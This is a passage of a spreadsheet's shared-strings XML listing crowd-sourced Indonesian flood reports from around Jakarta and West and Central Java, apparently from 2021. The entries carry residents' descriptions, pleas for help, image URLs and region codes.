  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4055", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir area Sidoasih, Tlogosari - Semarang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-Y-o2-fX4aiFPldbaDxC60co5yEaMzFLMuS4I3XqTxLvXsGwzAtVmq9DJqyEwyfyxJG5e1vX7fawgGFe3154h5Cc9qKkyFXmmTl4Sc6QTw=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap di belakang kantor samsat jakbar. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6ptLgrjFn0tUi88IY27yLwzSCjCoYRuGdg-HIbesAYzHY941UvFZ1OKr2LExgcAaLHu1dtI8W1CGTnI-72AAsDViIBPL-_74IALhjpPHQw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2381", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap di kawasan jembatan baru rawa buaya. Tolong benahi drainase</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lBOaUoQPo31qCNlG0HsvByO6WT0BvXCGKXqSx1yjDA6cYX-0RPUcws92oEQ5qBFFzoMzl2V3FWwXnkKZHCHfRpRIGWXADo2btPMWRpHpiQ8=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap Tolong benahi drainase</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/dpeISSASfEArxZTXxyZmmqMvlRzEeNW79rqhgBCQRoQxuFJuU9zZxNmZd00PNz4a8EMo23RFplbmwZkC9Sb0KJdI4IUYYlOxLqGLTFVo=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2580", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil kawasan poglar. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-ca7joIyANAwMnenNO9RXjcucvDTgxVNzT-J5V2WAPFP6Rer6w9_ASAY1g0zh_MXWIbOwdGKhJkaPmnPex4Vt2JzzycZmhM1LjKUuJwNKDk=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2467", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap #BanjirKiriman di rw 04 kampung melayu. Tolong solusi utk banjir</t>
  </si>
  <si>
    <t>0db528cd-28f3-4433-9c1b-8cd94ed2a897</t>
  </si>
  <si>
    <t>Banjir di daerah terboyo dan sekitarnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1ZMB4G3ka_L_B2Yrnsb34eA537Ke1MxCR6jiavlxKJm-d-YSUjeJS-ijhQUSd2NipHouIni9kr40944vdFg0JR0Iql53QSJsz7w_meX4=s480-c</t>
  </si>
  <si>
    <t>setiap hujan air selalu tergenang perlu ada saluran air pembuangan. akibat pembangunan tol becakayu #BanjirKecil</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jtqarG_ifW8Wxb8s1SvTHyx_Q6YlUyMDqq1Z68Ta8wrpNNQsoXaBMmKTWfPAb74GfWpf-afsOU0OJlRVIM09guEJ4K5pV7NH2kJhPnnkGg=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil di rt 10/05 kampung petukangan. Tolong benahi drainase</t>
  </si>
  <si>
    <t>762c37fe-81ef-4e77-9dec-9d5f6f10b837</t>
  </si>
  <si>
    <t>Futuh</t>
  </si>
  <si>
    <t>22a80dc3-0679-418c-8457-75ecbff4d63d</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3439", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Tgl 5 malam sampai tgl 6 pag1</t>
  </si>
  <si>
    <t>Pendrikan Lor</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/kiYLr5LneZFZ9bZg7H9b0yLUWEBXSp3Ha_uzbpu6WiXtmS9ryw9R1vvGljPeNNOC8yJHR4Puem5pEvbWdazm9TTKOjgq3TrTw9H-l3BODQ=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1wNIkUMPSIyEXZk9tOs_RbgVxDK2L6cyT3cilY5P0xeSsV7OVscLs9Pok7C3cnt6r5S9DUmUs1dk0cbLHE02Y2b3aVyMs0JyhdI2-CMnVOQ=s480-c</t>
  </si>
  <si>
    <t>59da0ac4-7c29-4fdd-8a98-22b7154cfa2d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59da0ac4-7c29-4fdd-8a98-22b7154cfa2d.jpg</t>
  </si>
  <si>
    <t>Banjir di sepanjang Jl WR Supratman terutama di gang 9 dekat Masjid Almubarok Kota Pekalongan Jawa Tengah , tinggi bervariasi 20 cm - 50 cm.</t>
  </si>
  <si>
    <t>4e56aac3-ecba-4198-a64c-f474a680176c</t>
  </si>
  <si>
    <t>Banjir hari ini di desa pringkasap kec.pabuaran kab.subang jawa barat ketinggian skitar lutut dewasa</t>
  </si>
  <si>
    <t>Pringkasap</t>
  </si>
  <si>
    <t>a016c570-3b01-4b06-b136-4f42b9c9e4d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a016c570-3b01-4b06-b136-4f42b9c9e4d0.jpg</t>
  </si>
  <si>
    <t>Banjir Komp. Perumahan Essence Park, kel. Jaticempaka, kec. Pondok Gede, kota Bekasi sudah bertahun tahun tanpa ada realisasi pemda terkait"</t>
  </si>
  <si>
    <t>61984d1d-c194-4e8f-a8dd-583a96fb938a</t>
  </si>
  <si>
    <t>Jalan Raya Puputan Renon banjir</t>
  </si>
  <si>
    <t>Dauh Puri</t>
  </si>
  <si>
    <t>Denpasar Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bbdx9uKibc_P5xGxStNutjDnsJp9tF0J8yLoQVvFm1IeAs_3y_Cd0-0Lfrm4cGhQhXfXwoI06RqO0X5XXAbPdlk1U-nnoPdZh1Vfd5sFdw=s480-c</t>
  </si>
  <si>
    <t>a1e0f940-5a8d-4411-adfe-a8d20c7f0079</t>
  </si>
  <si>
    <t>Dawuan Tengah</t>
  </si>
  <si>
    <t>Cikampek</t>
  </si>
  <si>
    <t>99f5abce-3f43-405c-be7b-4c6f26916d9b</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2805", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Genangan air belum surut, dibuka dapur umum oleh warga</t>
  </si>
  <si>
    <t>Sawahbesar</t>
  </si>
  <si>
    <t>2a516f45-4d48-4f62-8f11-47e8c7333240</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2a516f45-4d48-4f62-8f11-47e8c7333240.jpg</t>
  </si>
  <si>
    <t>Banjir se pinggang jam 1.46 dini hari kabupaten Indramayu</t>
  </si>
  <si>
    <t>Karangasem</t>
  </si>
  <si>
    <t>Terisi</t>
  </si>
  <si>
    <t>9731f92e-2f82-403f-96e7-2a2793af4a67</t>
  </si>
  <si>
    <t>Mohon bantuan nya, masih banyak yang terjebak didalam rumah di karenakan terbatasnya perahu karet</t>
  </si>
  <si>
    <t>Karangtumaritis</t>
  </si>
  <si>
    <t>Haurgeulis</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eGXx2apo43Ydj_4tj2yw3khtb3v0IXIA50gk13fBtZGQnFRFHPZ3VXoxop1Mxtmn_jVpnmwelR_vCTQnNvCmcDUtX1lA3hD0k8i4KLugsw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "701", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sampah bung... buang tiap hari.. mksh ya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9AM0aKHMYjldGVJT47JmZmfsklN9uzH14hyrXKhjuetTCafqOaIMCm6HTXYNMo1jp56va8QGn5GEDgoSfWpKmYuK34R_83wnu1L3jQFYNQ=s480-c</t>
  </si>
  <si>
    <t>penuh</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rrEti_upuWSWx8wpYIrMgYhPRKkw9Og31hmbl-t_fpdgO84suH2fYgtsodaC3PRdJ0EAL6EVRRwIUIOfSExZai8dUMTVM39NRjvcfpq7=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "703", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/touFCjSdeTDChrx8PNlDCjxkDSNyZ1DXA2KTqEkFH89ZMVdGfOgZyk-0lB-RrXo9thBCINODCxsWQSeu9fPg3M-Zoh_aLIzcBBDRO-T4=s480-c</t>
  </si>
  <si>
    <t>sampah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mVVBfs2sNdCxXT47XpD9DtJQiPA4lK7r5i94h5yrlbbKeyHh5XjCp5pDDExkuBeY6dC4xb7lBl-DkHd38yo6znXfKbXB-fPEF-NXo0_r=s480-c</t>
  </si>
  <si>
    <t>e499c446-3162-4ec9-9053-b2253ccb2079</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e499c446-3162-4ec9-9053-b2253ccb2079.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "63", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>cd4fddad-6f50-443a-a6d6-45613e57296a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cd4fddad-6f50-443a-a6d6-45613e57296a.jpg</t>
  </si>
  <si>
    <t>{ "points": -7, "flood_depth": 88, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jalan Jangga losarang</t>
  </si>
  <si>
    <t>e7962e48-00e4-4fc8-a6ff-30b9fde0cf5f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7962e48-00e4-4fc8-a6ff-30b9fde0cf5f.jpg</t>
  </si>
  <si>
    <t>Hujan deras dari malam sampe sekarang, air sungai cibeet mulai naik ke permukaan</t>
  </si>
  <si>
    <t>Pasirtanjung</t>
  </si>
  <si>
    <t>Cikarang Pusat</t>
  </si>
  <si>
    <t>4b0eb7cd-1623-443d-9720-88f06075e914</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b0eb7cd-1623-443d-9720-88f06075e914.jpg</t>
  </si>
  <si>
    <t>18f8e7c8-68bf-49cc-a716-1e2240be6f83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/18f8e7c8-68bf-49cc-a716-1e2240be6f83.jpg</t>
  </si>
  <si>
    <t>Mohon doa dan bantuannya Atas bencana banjir di daerah Pantura Barat Indramayu (Haurgeulis, Losarang,Terisi)</t>
  </si>
  <si>
    <t>Cipancuh</t>
  </si>
  <si>
    <t>2a94d25b-d0ca-4eae-8cf6-24ed7c0c31de</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "936", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jatinegara area waspada banjir air sudah meluap ke jl raya jatinegara, Belum sempat ambil photo karena saya terburu berangkat kerja.</t>
  </si>
  <si>
    <t>99e8cee3-2b85-42cb-b347-f90c93635d0a</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3071", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Setelah hujan lebat dini hari sampai pagi tadi ketinggian air meningkt lagi</t>
  </si>
  <si>
    <t>Sambirejo</t>
  </si>
  <si>
    <t>551f9d11-f1b8-462a-8524-107e84ac98ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/551f9d11-f1b8-462a-8524-107e84ac98ad.jpg</t>
  </si>
  <si>
    <t>Randegan wetan sebagian wilayah banjir</t>
  </si>
  <si>
    <t>Randegan Wetan</t>
  </si>
  <si>
    <t>Jatitujuh</t>
  </si>
  <si>
    <t>Majalengka</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/_B1fVMgFT8s4EvH1vuB2UqVfFpjscidYkOhMVhZVGwEKQjww8obfRfata00INyBCpxH5xv_x41U8z6cvIW5GcjtRK4xVNxewjlG-SJJBuw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1652", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>genangan air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/10H1j5zFPAd9grqSR0cMjknP6yvGS5jh3i6Bdh9K26xnGLkUltKnKSPETT14nT2oDVB0I9jBA14HYtYSvSiXzaVwrAWxuriPW2s-zNEzAA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1730", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirKiriman di sekitar pasar lama jatinegara. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VNdCWMboGK5LgXX5RFOf8ZLcjX9fHwl_emSjV7kit7HrhDiw2QS53TMePmW-_TCm1f3ZOx1kBo1XljX1Tmv33E7wUI8fJnVanyb5QWfs=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap #BanjirKiriman di sekitaran bukit duri plaza. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>8136ae13-aeea-4826-9a98-a63abeb1c64b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8136ae13-aeea-4826-9a98-a63abeb1c64b.jpg</t>
  </si>
  <si>
    <t>Banjir wilayah ciasem dan sekitarnya</t>
  </si>
  <si>
    <t>Ciasem Tengah</t>
  </si>
  <si>
    <t>Ciasem</t>
  </si>
  <si>
    <t>3b8f7517-715c-484c-b69e-ac36e5b29989</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b8f7517-715c-484c-b69e-ac36e5b29989.jpg</t>
  </si>
  <si>
    <t>Banjir sepinggang</t>
  </si>
  <si>
    <t>Sarimulya</t>
  </si>
  <si>
    <t>Kotabaru</t>
  </si>
  <si>
    <t>32137520-f6f3-4462-8b96-d9c3a7355b9b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32137520-f6f3-4462-8b96-d9c3a7355b9b.jpg</t>
  </si>
  <si>
    <t>Hampir seluruh wilayah indramayu tengah-barat mengalami banjir yang parah, mohon untuk pengecekan lokasi dan bantuanya, terimakasih.</t>
  </si>
  <si>
    <t>d5352cc2-3854-48dd-b066-722905f064cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d5352cc2-3854-48dd-b066-722905f064cc.jpg</t>
  </si>
  <si>
    <t>Cilamaya hilir tanggul jebol</t>
  </si>
  <si>
    <t>Pinangsari</t>
  </si>
  <si>
    <t>7f88eb7a-ff6e-4926-81d6-a95b00793e09</t>
  </si>
  <si>
    <t>Banjir dari pagi tadi sekitar pukul 9.00 wib</t>
  </si>
  <si>
    <t>be216f22-be7c-4cd0-a482-3984ec44327b</t>
  </si>
  <si>
    <t>Genangan air di Jembatan 1 Narogong..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mxgf4MgxJTK0mlGkaaH97gBGFz8b5MS_080a1vkRpXkjx81BoyAQVbJnBvStzq-vloYhT8m5uzS4KD61TMbVBCKNZtPnFOZs9lS4ReAr=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman ini petugasnya telat respon, banjir udah masuk ke rumah orang baru mobil datang dan masang alat. sementar mesin di rumah pompa bermasalah. mohon di TL"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/EdTBYRTpzQVpU3T_ycIl1Z2kCQcv2Y7GS0CwHiZT3v8Lsp2FMC2w_xOKV9_9DUGjFSdpEsTN7hkHQDNMvleUUR_uQ-ecqsSbGICT8iqnHkU=s480-c</t>
  </si>
  <si>
    <t>tolong TL serius bukan abal2</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Pf3IXL4ujwagzLYzoUvI6q0Xg7bo6hlmv5lOWPdaUoNfXeAMxjg2lMA8-iXoFfERyAS8TlCaPtPfYC6Y5o3On8rJ1jsUpw8ioFw3xUjde3M=s480-c</t>
  </si>
  <si>
    <t>tolong TL serius</t>
  </si>
  <si>
    <t>4deea87a-11d8-441b-be19-4d24d8c0bf75</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4deea87a-11d8-441b-be19-4d24d8c0bf75.jpg</t>
  </si>
  <si>
    <t>Terjadi Banjir di Desa Kudangwangi Ujungjaya Kabupaten Sumedang, merendam pemukiman dan akses sementara jalan terputus</t>
  </si>
  <si>
    <t>Kudangwangi</t>
  </si>
  <si>
    <t>Ujung Jaya</t>
  </si>
  <si>
    <t>2c8aaf20-2e3b-4e1b-8d68-886159b1f75e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2c8aaf20-2e3b-4e1b-8d68-886159b1f75e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2945", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir selama 3 hari belum surut hujan juga masih deras</t>
  </si>
  <si>
    <t>93c5a671-7e51-4c68-8188-e806366c1d92</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93c5a671-7e51-4c68-8188-e806366c1d92.jpg</t>
  </si>
  <si>
    <t>Tolong bantu pak</t>
  </si>
  <si>
    <t>c6b02e93-4706-4308-9932-c39370feacac</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2946", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Tolong pak ada lansia dan anak kecil. Tolong segera ditangani. Banjir kaligawe dan telogosari semarang</t>
  </si>
  <si>
    <t>2d181172-3787-46d5-b6d2-8e1d64fcb932</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2d181172-3787-46d5-b6d2-8e1d64fcb932.jpg</t>
  </si>
  <si>
    <t>Sepanjang jalan raya pertamina buni bakti tambah banyak titik genangan airnya</t>
  </si>
  <si>
    <t>Bunibakti</t>
  </si>
  <si>
    <t>c264493c-3be4-44f3-b4c6-79360c617843</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c264493c-3be4-44f3-b4c6-79360c617843.jpg</t>
  </si>
  <si>
    <t>Banjir di desa babakan jaya blok kandamghaur, kec. Gabuswetan kab.indramayu</t>
  </si>
  <si>
    <t>Babakanjaya</t>
  </si>
  <si>
    <t>Gabuswetan</t>
  </si>
  <si>
    <t>11862fc4-0ed9-407e-97c0-b2af04bb2712</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11862fc4-0ed9-407e-97c0-b2af04bb2712.jpg</t>
  </si>
  <si>
    <t>Mengungsi di tempat aman supaya tidak terkena banjit</t>
  </si>
  <si>
    <t>Brondong</t>
  </si>
  <si>
    <t>Pasekan</t>
  </si>
  <si>
    <t>8511d19e-897e-418a-b794-3dbd3cde14b9</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3327", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Rsi sultan agung semarang</t>
  </si>
  <si>
    <t>185edb45-13ac-4136-a0cc-79e1339ff4d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/185edb45-13ac-4136-a0cc-79e1339ff4d9.jpg</t>
  </si>
  <si>
    <t>Banjir Gg Malikalong / Jl Madrasah. Rawa Buaya, Cengkareng.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357738</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/08/357738-1612783173146625690.mp4-03.jpg</t>
  </si>
  <si>
    <t>Cari Alternatif! Genangan Air di Jatinegara Belum Surut Juga</t>
  </si>
  <si>
    <t>Masih banjir sore ini Jalan Jatinegara Barat setinggi lutut orang dewasa, lalulintas macet parah, untuk pengendara motor harap mencari alternatif jalur lain, ditakutkan motor mogok. #banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vH0fah3TnqPuRL_Kdxcg8KRgMc0-Mm860ZoV4HgylV2LKSATs3iGwyrBLVYHiefZpXWKzhMzxjZaut7WH2bfgY-ZrOFX971AQFz0bOq4iw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1729", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirKiriman Tolong benahi drainase</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/D21yO4azJPgUmDF4jgF4n2hFUdsSCoO_S1chZpOhh9frbkX7z-TY_N6QVY00K_JrJ2Dxm7JCdXBFO0JUByMepUQ2xENyp5iZwE7JjCCE=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman #BanjirKecil Tolong di atasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/QzCZmaKoewtK8PjUMv2DLiQRZfx_fLxAEeIczkxRFlzZDRtR4Q08pp-CB2P6zofQriyNWZgvXoVivZQLuc_D-bb8mRIzYkO8VN8Ahe6AwA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "172", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman #BanjirKecil di rt 05 kampung melayu. Tolong di atasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vyRVdy8DrisMu1LJL8qnOxyb3xsePPHiCACbpexZsuVURUC2rA7wi401VPzTCQnXUeILAjfYwHj_-6M2Uef1Zdc9ADsnILsdzJeS6bOa6Q=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2375", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman #BanjirKecil byk titik banjir di rw 03. Tolong di atasi</t>
  </si>
  <si>
    <t>245bcba4-5e4b-4f3b-b821-46b32d82909a</t>
  </si>
  <si>
    <t>Tangul citarum sudah hampir meluap, sebaik nya kasih himbawan waspada dan buat warga sekitar tenang, karna sangat lah resah bilang memang me</t>
  </si>
  <si>
    <t>Rengasdengklok Selata</t>
  </si>
  <si>
    <t>Rengasdengklok</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/69dyN5ifzkMTnB1zDN5I2uZRnXjExXBrMV6GvGxNQczH6mnVW0TVMXHeSW2Bkdt5-rEamIMVNgNan5RdChAOZYMZ9X8YZVZZk38-gNUO=s480-c</t>
  </si>
  <si>
    <t>mohon operator mobil pompa di pompa 5 slalu stand by krn di pompa 5  bila kali ciliwung penuh hujan sedikit langsung banjir.. sy korban banjir pertama di pompa 5 dan dr smlm  sy sdh kebanjiran 3 kali krnnketidak siap siagaan para personil sSDA. mohon eva</t>
  </si>
  <si>
    <t>ae141eaa-45ea-497f-9fc9-6982b783699b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ae141eaa-45ea-497f-9fc9-6982b783699b.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 99, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di perumahan bumi anugerah sejahtera setinggi dada org dewasa, banyak yg mengungsi di kantor rw, meluap dr pukul 10 siang.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/NgyP5me6eNAORLe_PwtZiUvSZF0tRHnF2YAs2cs9357FCL_-qHMH3OWRww3kcTccGefOknpLwFPn8tbPy4Cj6BNeRO56xIA91d2fjh58qg=s480-c</t>
  </si>
  <si>
    <t>banjir sekitar mata kaki di jalan sd inpres #kelurahanrambutan, tolong #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/V6D7bFffc5-8NTgxLdR4ij343ztWTnTUhFeUfvo_5Cxk0lGlPmKzl_-C2azRQ09ivXcApPkAcqdxuhJqRjExcOFCVQORpxOQHz2GnTIG=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tlong di kontrol pintu air ya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0X7uF2lCcMWzIprjF9uBYFktRf7lMZTkF_wliexblmgmG3PYXIKMgMYKuK9UTY7bEoUrRCC2nzij0wNVTweC6jzHcEjCrfdUFAFKngRJ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2313", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong ditindak lanjuti subtansi terkait , air sudah menggenang hampir 1 minggu tidak surut2 di daerah rawa melati RT.06 RW.01 gang H.Murhasan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/h1yEhT05HJkwpkFO5Ya5Da6iip3cD6oZ7f8GygnjI0m-FwwltD-4_ISb3L1EVbZATB0N4U7kiqAsuBZF_jzocae2_CeLtlYextWywZQc0Q=s480-c</t>
  </si>
  <si>
    <t>Mohon bantuan SDA rumah warga RT.06 RW.01 kebanjiran sudah hampir 1 minggu lebih . Rumah mba lela dekat kelapa 2</t>
  </si>
  <si>
    <t>d46b03ed-2a2a-48f5-b762-727041a93066</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d46b03ed-2a2a-48f5-b762-727041a93066.jpg</t>
  </si>
  <si>
    <t>Tanjungmekar</t>
  </si>
  <si>
    <t>Karawang Barat</t>
  </si>
  <si>
    <t>31e5f8f2-fe68-4b20-b700-97604825e487</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31e5f8f2-fe68-4b20-b700-97604825e487.jpg</t>
  </si>
  <si>
    <t>Bendungan kali cimanuk ambruk dan langsung banjir</t>
  </si>
  <si>
    <t>Tukdana</t>
  </si>
  <si>
    <t>aaa7e4aa-bedf-41f9-910d-7ccedbe95ad1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aaa7e4aa-bedf-41f9-910d-7ccedbe95ad1.jpg</t>
  </si>
  <si>
    <t>Membutuhkan bantuan sesegera mungkin</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/BwYQ1t7C3fzB6kIFsoPM1OvSslbvvA4c61CUAt4smjgkFHE8FNFPd9NY0Pmh7rztKuSG-Y9p_-MZ-azY3cXmW17O4TUw67-Wpdo6kB1O0Q=s480-c</t>
  </si>
  <si>
    <t>sepanjang got ini tlg di keruk tiap hari pak lurah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ki6-XiMIviICbBU9fAAVgjJ1aC50R8tIS5qF7Th6xTQbzIvXMxTioiodbUsjRvVmcPNoEFzTC-yG6hBmz9T7Lpv3ACfijJqXI0Cxzolo9A=s480-c</t>
  </si>
  <si>
    <t>sepanjang got di keruk tiap hari bung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/70lN4mLD7ONAbB3Ckx7_6I43nMGRexDgVvd78dQTdPNBccQD7DCgQxRho0jF04DR54iugd7sYdJgkXFvg5cMIzuXjjou2CqV3pTBUGPxIvw=s480-c</t>
  </si>
  <si>
    <t>sepanjang got keruk tanah nya.. rawan banjir krn got ga jln lancar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RoL_fj5H7vecO0gYXabU9Qk-kphxLdBOzbZFo6sGj8HwvL2mvmZtxf11I_WeV7ctwEh4Ri9kgRT9VFV48_daBNc8Qvk8BVNuyAegeBhSNw=s480-c</t>
  </si>
  <si>
    <t>tolong TL serius banjir gak surut dari kemaren</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357744</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/09/357744-1612834531235450085.mp4-03.jpg</t>
  </si>
  <si>
    <t>Jalan Raya Tarumajaya Kab Bekasi Banjir</t>
  </si>
  <si>
    <t>Jalan Raya Tarumajaya Kab. Bekasi rusak. Saat ini kondisi dalam keadaan banjir karena diguyur hujan</t>
  </si>
  <si>
    <t>8e9d2225-d7fb-437d-a236-afecbfdb519c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8e9d2225-d7fb-437d-a236-afecbfdb519c.jpg</t>
  </si>
  <si>
    <t>Banjir 2021, pamanukan subang</t>
  </si>
  <si>
    <t>Gardumukti</t>
  </si>
  <si>
    <t>Tambakdahan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/tmNxY5sq4y76GSqvPnR68S5aAeTTJ2NcxnTo-5PYaYqy2uwyK5cokx68Ay1BBsUatF7iN4MxBf7d7W4RVQl6SrgF1U1ZkqoE0adoQr7hIA=s480-c</t>
  </si>
  <si>
    <t>banjir gak surut2</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xRbyQAyMvJknhydyn47SagI-mNcdoO-kbsQHCVp7wXmxUtU6uY4u7S8GaRYK7xFKxEbD4nOslpCn4jQzy4-oQP3nWV3GVmqaNnHFWSDffX8=s480-c</t>
  </si>
  <si>
    <t>tolong TL banjir terus</t>
  </si>
  <si>
    <t>a4cb4dee-4454-4765-b181-8ff36f79e7cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4cb4dee-4454-4765-b181-8ff36f79e7cc.jpg</t>
  </si>
  <si>
    <t>Tolong bantuan nya, kalau hanya report saja setelah nya harus ada tindakan pak jangan hanya di tampung2 laporan kami</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/n2oWibY2N85TApnXMLkmh0vluG_LwrTnmydk3acvy1XtkvpG8sz-Q4IeeUx_1qhVzNXXC_Snp55--eVKilA1fCNWq45CTHP3bf8-mZfRGE8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "817", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirKiriman Tolong di atasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VfHMUJ4Lg1dUkRc6u6i1RsnW0KhSKFv6dH7rttyak2UpNqdG0OIfCi-ZH2qw51t7r-Bkx_nu4Sy-aQ6BxuXObi7ukyyF-0j5_x06vRf84w=s480-c</t>
  </si>
  <si>
